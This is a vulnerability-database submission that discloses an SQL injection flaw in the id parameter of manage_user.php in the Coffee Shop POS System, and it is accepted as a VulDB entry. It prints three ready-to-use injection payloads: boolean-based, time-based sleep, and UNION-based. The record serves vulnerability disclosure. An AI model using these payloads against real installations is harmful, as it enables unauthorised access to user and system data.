| Title | SQL injection vulnerability exists in Coffee Shop POS System |
|---|
| Description | SQL injection vulnerability exists in id parameter of /admin/user/manage_user.php file of Coffee Shop POS System
Important user data or system data may be leaked and system security may be compromised
The environment is secure and the information can be used by malicious users.
When visit /admin/index.php and page parameter is ‘user/manage_user’,it will include /admin/user/manage_user.php,and id parameter can do sql injection.
Payload:
page=user/manage_user&id=1' AND 2678=2678 AND 'TkSe'='TkSe
or
page=user/manage_user&id=1' AND (SELECT 4852 FROM (SELECT(SLEEP(5)))rple) AND 'aaQF'='aaQF
or
page=user/manage_user&id=-4079' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a627071,0x7063415a6d7665494f4c4a4450414b524553537771734d764b69784c64735245766756466475504a,0x7178717a71),NULL,NULL,NULL,NULL,NULL,NULL-- - |
|---|
| Source | ⚠️ https://github.com/E1CHO/cve_hub/blob/main/Coffee%20Shop%20POS%20System/Coffee%20Shop%20POS%20System%20-%20vuln%207.pdf |
|---|
| User | SSL_Seven_Security Lab_WangZhiQiang_XiaoZiLong (UID 38936) |
|---|
| Submission | 04/19/2023 12:16 (3 years ago) |
|---|
| Moderation | 04/21/2023 08:29 (2 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 226980 [Campcodes Coffee Shop POS System 1.0 manage_user.php ID sql injection] |
|---|
| Points | 20 |
|---|